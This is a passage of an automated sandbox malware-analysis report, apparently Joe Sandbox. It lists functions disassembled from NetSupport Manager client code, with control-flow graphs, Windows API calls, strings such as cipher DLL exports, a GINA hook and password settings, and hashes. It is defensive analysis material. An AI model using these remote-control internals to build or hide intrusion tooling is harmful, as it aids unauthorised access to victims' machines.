                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                        • API String ID: 1609618855-357498123
                                                                                        • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                        • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                        • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                        • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                        Function 11086700 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2484 11086700-1108671d call 110866f0 2487 1108671f-1108672f call 11161d01 2484->2487 2488 11086730-11086740 call 11144bd0 2484->2488 2493 11086742-1108674a 2488->2493 2493->2493 2494 1108674c-11086752 2493->2494 2495 11086753-11086759 2494->2495 2495->2495 2496 1108675b-11086792 LoadLibraryA 2495->2496 2497 110867f9-1108680e GetProcAddress 2496->2497 2498 11086794-1108679b 2496->2498 2501 1108689c-110868ad call 11161d01 2497->2501 2502 11086814-11086823 GetProcAddress 2497->2502 2499 1108679d-110867ee GetModuleFileNameA call 11081b40 LoadLibraryA 2498->2499 2500 110867f0-110867f3 2498->2500 2499->2500 2500->2497 2500->2501 2502->2501 2503 11086825-11086834 GetProcAddress 2502->2503 2503->2501 2506 11086836-11086845 GetProcAddress 2503->2506 2506->2501 2509 11086847-11086856 GetProcAddress 2506->2509 2509->2501 2510 11086858-11086867 GetProcAddress 2509->2510 2510->2501 2511 11086869-11086878 GetProcAddress 2510->2511 2511->2501 2512 1108687a-11086889 GetProcAddress 2511->2512 2512->2501 2513 1108688b-1108689a GetProcAddress 2512->2513 2513->2501 2514 110868ae-110868c3 call 11161d01 2513->2514
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                        • API String ID: 2201880244-3035937465
                                                                                        • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                        • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                        • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                        • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                        Function 11141890 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2517 11141890-111418c6 2518 111418cf-111418e4 call 1110f420 2517->2518 2519 111418c8-111418ca 2517->2519 2525 111418e6-1114190e call 11060f70 2518->2525 2526 11141910-11141912 2518->2526 2520 111421f2-1114220d call 11161d01 2519->2520 2528 11141918-11141947 call 11061700 2525->2528 2526->2528 2533 11141950-1114195d call 11142e50 2528->2533 2534 11141949-1114194a RegCloseKey 2528->2534 2537 11141964-11141985 call 11144dc0 call 11143230 2533->2537 2538 1114195f 2533->2538 2534->2533 2543 11141997-111419ad call 1110f420 2537->2543 2544 11141987-11141992 call 11062d60 2537->2544 2538->2537 2548 111419c2 2543->2548 2549 111419af-111419c0 call 11060be0 2543->2549 2544->2543 2550 111419c8-111419e2 call 1110f420 2548->2550 2549->2550 2555 111419e4-111419f5 call 11060be0 2550->2555 2556 111419f7 2550->2556 2558 111419fd-11141a17 call 1110f420 2555->2558 2556->2558 2562 11141a2c 2558->2562 2563 11141a19-11141a2a call 11060be0 2558->2563 2565 11141a32-11141a79 call 11060760 * 2 2562->2565 2563->2565 2571 11141a80 2565->2571 2572 11141a87-11141a8e 2571->2572 2573 11141a90-11141a97 2572->2573 2574 11141a9d-11141aa5 2572->2574 2573->2574 2575 11141d9a 2573->2575 2576 11141aa7-11141aad 2574->2576 2577 11141ac9-11141ad0 2574->2577 2578 11141da0-11141da2 2575->2578 2576->2577 2579 11141aaf-11141abc call 110607f0 2576->2579 2580 11141af5-11141b03 2577->2580 2581 11141ad2-11141ad9 2577->2581 2582 1114217f-11142187 2578->2582 2583 11141da8-11141df2 call 110d1550 call 1105dd10 2578->2583 2603 11141ac7 2579->2603 2604 11141abe-11141ac5 2579->2604 2584 11141b05-11141b07 2580->2584 2585 11141b0d-11141b0f 2580->2585 2581->2580 2587 11141adb-11141ae8 call 110607f0 2581->2587 2588 11142191-11142199 2582->2588 2589 11142189-1114218d 2582->2589 2634 11141f3d-11141f85 call 11060f40 call 1106b5c0 call 110679c0 2583->2634 2635 11141df8-11141e1f call 11060760 call 110607f0 2583->2635 2584->2575 2584->2585 2592 11141b11-11141b13 2585->2592 2593 11141b5d-11141b5f 2585->2593 2605 11141af3 2587->2605 2606 11141aea-11141af1 2587->2606 2598 111421a3-111421ab 2588->2598 2599 1114219b-1114219f 2588->2599 2589->2588 2601 11141b15-11141b1b 2592->2601 2602 11141b2f-11141b31 2592->2602 2596 11141b61-11141b66 2593->2596 2597 11141b68-11141b6a 2593->2597 2607 11141b8b-11141ba5 call 11081bb0 2596->2607 2608 11141b73-11141b89 call 11081bb0 2597->2608 2609 11141b6c-11141b71 2597->2609 2610 111421b5-111421f0 call 11060640 * 2 call 111618c1 2598->2610 2611 111421ad-111421b1 2598->2611 2599->2598 2601->2602 2612 11141b1d-11141b2a call 11146450 2601->2612 2613 11141d85-11141d98 call 11146450 2602->2613 2614 11141b37-11141b3e 2602->2614 2603->2577 2604->2577 2605->2580 2606->2580 2630 11141cac-11141ce9 call 1105de00 call 111319f0 2607->2630 2631 11141bab 2607->2631 2608->2607 2609->2607 2610->2520 2611->2610 2612->2571 2613->2578 2614->2613 2620 11141b44-11141b58 call 11146450 2614->2620 2620->2572 2664 11141cf1-11141cf8 2630->2664 2665 11141ceb 2630->2665 2636 11141bb5 2631->2636 2637 11141bad-11141baf 2631->2637 2689 11141f87 2634->2689 2690 11141fb3-11141fe8 EnterCriticalSection call 11060420 call 11060f40 2634->2690 2667 11141e21-11141e50 call 11146450 call 110607f0 2635->2667 2668 11141e52-11141e7a call 11060760 call 110607f0 2635->2668 2643 11141c3e-11141c7b call 1105de00 call 111319f0 2636->2643 2644 11141bbb-11141bc1 2636->2644 2637->2630 2637->2636 2678 11141c83-11141c8a 2643->2678 2679 11141c7d 2643->2679 2650 11141bc7-11141bcb 2644->2650 2651 11141be7-11141be9 2650->2651 2652 11141bcd-11141bcf 2650->2652 2662 11141bec-11141bee 2651->2662 2660 11141bd1-11141bd7 2652->2660 2661 11141be3-11141be5 2652->2661 2660->2651 2670 11141bd9-11141be1 2660->2670 2661->2662 2671 11141bf0-11141c2a call 1105de00 call 111319f0 2662->2671 2672 11141c32-11141c39 2662->2672 2674 11141d0a 2664->2674 2675 11141cfa-11141d08 2664->2675 2665->2664 2667->2668 2709 11141eb1-11141ed8 call 11060760 call 110607f0 2668->2709 2710 11141e7c 2668->2710 2670->2650 2670->2661 2671->2672 2711 11141c2c 2671->2711 2676 11141d11 2672->2676 2674->2676 2675->2674 2675->2676 2683 11141d18-11141d1a 2676->2683 2685 11141c9c 2678->2685 2686 11141c8c-11141c9a 2678->2686 2679->2678 2691 11141d1c-11141d1e 2683->2691 2692 11141d3e-11141d56 call 11081c60 2683->2692 2695 11141ca3-11141caa 2685->2695 2686->2685 2686->2695 2698 11141f90-11141f9e call 110508e0 2689->2698 2722 11141ffa-1114200c LeaveCriticalSection 2690->2722 2723 11141fea-11141ff7 call 1102a9f0 2690->2723 2691->2692 2699 11141d20-11141d38 call 11081bb0 2691->2699 2716 11141d58 2692->2716 2717 11141d5b-11141d73 call 11081c60 2692->2717 2695->2683 2719 11141fa0-11141fa1 2698->2719 2720 11141fa3 2698->2720 2699->2572 2699->2692 2742 11141f11-11141f38 call 11060640 * 3 2709->2742 2743 11141eda 2709->2743 2718 11141e80-11141eaf call 11146450 call 110607f0 2710->2718 2711->2672 2716->2717 2739 11141d75-11141d78 2717->2739 2740 11141d7d-11141d80 2717->2740 2718->2709 2726 11141fa4-11141fb1 call 110679c0 2719->2726 2720->2726 2729 11142051-1114209e call 11133400 call 110d1550 call 110cff20 2722->2729 2730 1114200e-11142010 2722->2730 2723->2722 2726->2690 2726->2698 2768 111420a4-111420c1 call 110d12e0 2729->2768 2769 1114214c-11142179 call 110d07c0 call 1106b620 call 110d07c0 2729->2769 2730->2729 2738 11142012-11142034 call 11146450 call 1113cc30 call 111414a0 2730->2738 2738->2729 2766 11142036-1114204e call 11146450 call 11026ba0 2738->2766 2739->2572 2740->2572 2742->2634 2747 11141ee0-11141f0f call 11146450 call 110607f0 2743->2747 2747->2742 2766->2729 2781 111420c3-111420d7 call 11029450 2768->2781 2782 111420da-111420f0 call 11081bb0 2768->2782 2769->2582 2781->2782 2789 111420f2-1114210a call 11009450 call 11081a70 2782->2789 2790 1114212b-11142145 2782->2790 2789->2790 2797 1114210c-11142129 call 11009450 2789->2797 2794 1114214a 2790->2794 2794->2769 2797->2794
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 3535843008-2062829784
                                                                                        • Opcode ID: 027c4974fe4e47a31e6b1b92b845a70a180c4de8d1209735ca177a368e2ea53b
                                                                                        • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                        • Opcode Fuzzy Hash: 027c4974fe4e47a31e6b1b92b845a70a180c4de8d1209735ca177a368e2ea53b
                                                                                        • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                        Function 11074A00 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                        • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                        • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                        • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                        • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                        • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                        • _strncpy.LIBCMT ref: 11074B68
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                        • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                        • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                        • std::exception::exception.LIBCMT ref: 11074D68
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                        • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                        • API String ID: 703120326-1497550179
                                                                                        • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                        • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                        • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                        • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                        Function 11108D30 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                        • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                        • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                        • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                          • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                          • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                          • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                          • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                        • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                        • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                          • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                          • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                        • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                          • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                          • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                          • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                        • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                        • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                        • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                        • API String ID: 3930710499-403456261
                                                                                        • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                        • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                        • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                        • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                        Function 11138C30 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2924 11138c30-11138c47 2925 11139072-11139081 call 11161d01 2924->2925 2926 11138c4d-11138c54 2924->2926 2926->2925 2928 11138c5a-11138c61 2926->2928 2928->2925 2930 11138c67-11138c6e 2928->2930 2930->2925 2931 11138c74-11138c7b 2930->2931 2931->2925 2932 11138c81-11138c91 call 111450a0 2931->2932 2935 11138c93-11138c9a 2932->2935 2936 11138ca0-11138ce7 call 1105dd10 call 110637c0 2932->2936 2935->2925 2935->2936 2941 11138cf5-11138d1e call 1112c920 2936->2941 2942 11138ce9-11138cf0 2936->2942 2945 11138d24-11138d27 2941->2945 2946 11138dda call 110ea430 2941->2946 2942->2941 2948 11138d35 2945->2948 2949 11138d29-11138d2e 2945->2949 2950 11138ddf-11138de1 2946->2950 2952 11138d3b-11138d46 2948->2952 2949->2948 2951 11138d30-11138d33 2949->2951 2953 11138de3-11138dfe call 1105dd10 2950->2953 2954 11138e00-11138e0f PostMessageA 2950->2954 2951->2952 2955 11138d48 2952->2955 2956 11138d4d-11138d65 2952->2956 2953->2954 2958 11138e15-11138e1a 2953->2958 2954->2958 2955->2956 2963 11138dc1-11138dc8 2956->2963 2964 11138d67-11138d6d 2956->2964 2961 11138e25-11138e29 2958->2961 2962 11138e1c-11138e20 call 1110f270 2958->2962 2966 11138e2b-11138e33 2961->2966 2967 11138e4d-11138e76 call 11130410 call 11146ec0 call 1112cb20 call 111618c1 2961->2967 2962->2961 2971 11138dd7 2963->2971 2972 11138dca-11138dd1 call 11131a80 2963->2972 2968 11138d6f-11138d74 2964->2968 2969 11138dbc 2964->2969 2973 11138e35-11138e4b 2966->2973 2974 11138e79-11138e81 2966->2974 2967->2974 2968->2969 2975 11138d76-11138d7b 2968->2975 2969->2963 2971->2946 2972->2971 2986 11138dd3 2972->2986 2973->2974 2977 11138e83-11138e9d call 111618c1 call 11161d01 2974->2977 2978 11138e9e-11138ec4 call 11142e80 call 11146ee0 SetWindowTextA 2974->2978 2975->2969 2982 11138d7d-11138d9f 2975->2982 2998 11138ed0-11138ee9 call 111618c1 * 2 2978->2998 2999 11138ec6-11138ecd call 111352b0 2978->2999 2982->2969 2995 11138da1-11138db0 call 11145b40 2982->2995 2986->2971 3008 11138db2-11138dba 2995->3008 3011 11138eeb-11138eef 2998->3011 3012 11138f2e-11138f32 2998->3012 2999->2998 3008->2969 3008->3008 3015 11138f03-11138f0a 3011->3015 3016 11138ef1-11138f01 call 111352b0 3011->3016 3013 11138f38-11138f3a 3012->3013 3014 11138ffc-11138ffe 3012->3014 3021 11138f5c-11138f69 call 110f8640 3013->3021 3022 11138f3c-11138f3e 3013->3022 3017 11139000-11139002 3014->3017 3018 1113901d-1113902a call 110f8640 3014->3018 3019 11138f24 3015->3019 3020 11138f0c-11138f21 call 11131210 3015->3020 3016->3015 3016->3020 3026 11139013-1113901a call 11131210 3017->3026 3027 11139004-1113900e call 111352b0 3017->3027 3037 1113906f-11139071 3018->3037 3041 1113902c-1113903c IsWindowVisible 3018->3041 3019->3012 3020->3019 3021->3037 3038 11138f6f-11138f80 IsWindowVisible 3021->3038 3022->3021 3030 11138f40-11138f50 call 111352b0 3022->3030 3026->3018 3027->3026 3030->3021 3045 11138f52-11138f59 call 11131210 3030->3045 3037->2925 3038->3037 3043 11138f86-11138f96 call 111450a0 3038->3043 3041->3037 